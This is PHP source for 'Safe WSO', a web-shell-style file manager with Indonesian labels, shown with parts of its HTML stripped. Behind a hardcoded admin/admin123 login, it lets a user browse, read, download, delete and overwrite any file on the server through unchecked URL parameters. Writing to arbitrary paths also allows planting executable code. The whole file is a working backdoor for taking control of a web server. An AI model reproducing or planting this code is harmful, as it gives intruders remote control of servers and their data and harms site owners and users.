Safe WSO

session_start();// Login config$USER = "admin";$PASS = "admin123";if (!isset($_SESSION['logged_in'])) { if ($_SERVER['REQUEST_METHOD'] == 'POST') { if ($_POST['username'] === $USER && $_POST['password'] === $PASS) { $_SESSION['logged_in'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error = "Login gagal!"; } } echo ' <!DOCTYPE html> Safe WSO <title>Safe WSO</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet"> <style>body{background:#121212;color:white}</style> <body class="d-flex justify-content-center align-items-center vh-100"> '; exit;}// Logoutif (isset($_GET['logout'])) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit;}// File actions$path = isset($_GET['path']) ? $_GET['path'] : getcwd();if (!file_exists($path)) $path = getcwd();chdir($path);function h($str) { return htmlspecialchars($str, ENT_QUOTES, 'UTF-8');}function list_dir($path) { $items = scandir($path); foreach ($items as $item) { if ($item == ".") continue; $full = $path . DIRECTORY_SEPARATOR . $item; $is_dir = is_dir($full); $link = "?path=" . urlencode($full); echo ""; echo "" . ($is_dir ? "📁" : "📄") . ""; echo "<a href='" . h($link) . "'>" . h($item) . "</a>"; echo "" . ($is_dir ? "-" : filesize($full)) . ""; echo " <a class='btn btn-sm btn-secondary' href='?edit=" . urlencode($full) . "'>Edit</a> <a class='btn btn-sm btn-success' href='?download=" . urlencode($full) . "'>Download</a> <a class='btn btn-sm btn-danger' href='?delete=" . urlencode($full) . "' onclick='return confirm(\"Hapus?\")'>Delete</a> "; echo ""; }}if (isset($_GET['delete'])) { $target = $_GET['delete']; if (is_file($target)) unlink($target); header("Location: ?path=" . urlencode(dirname($target))); exit;}if (isset($_GET['download'])) { $file = $_GET['download']; if (is_file($file)) { header("Content-Disposition: attachment; filename=" . basename($file)); header("Content-Type: application/octet-stream"); readfile($file); exit; }}if (isset($_GET['edit'])) { $file = $_GET['edit']; if ($_SERVER['REQUEST_METHOD'] === 'POST') { file_put_contents($file, $_POST['content']); header("Location: ?path=" . urlencode(dirname($file))); exit; } $content = file_get_contents($file);Edit echo "<!DOCTYPE html><title>Edit</title> <link href='https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css' rel='stylesheet'> <style>body{background:#121212;color:white}</style><body class='p-4'>"; echo "<h4>Edit: " . h(basename($file)) . "</h4>"; echo ""; echo ""; exit;}if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) { $up = $_FILES['file']; $allow = ['txt','html']; $ext = strtolower(pathinfo($up['name'], PATHINFO_EXTENSION)); if (in_array($ext, $allow)) { $target = $path . DIRECTORY_SEPARATOR . basename($up['name']); if (is_writable($path)) { move_uploaded_file($up['tmp_name'], $target); } else { echo "<div class='alert alert-danger'>Folder tidak bisa ditulis: $path</div>"; } } header("Location: ?path=" . urlencode($path)); exit;}Safe WSOecho "<!DOCTYPE html><title>Safe WSO</title><link href='https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css' rel='stylesheet'><style>body{background:#121212;color:white} a{color:#0df}</style><body class='p-4'>";echo "<div class='mb-3'><h4>Safe WSO File Manager</h4>";echo "<a href='?logout=1' class='btn btn-sm btn-warning'>Logout</a></div>";echo "<div class='mb-3'><strong>Path: </strong>" . h($path) . "</div>";echo "";echo "<table class='table table-dark table-striped'><thead><th>#</th><th>Nama</th><th>Ukuran</th><th>Aksi</th></thead><tbody>";list_dir($path);echo "</tbody>";echo "";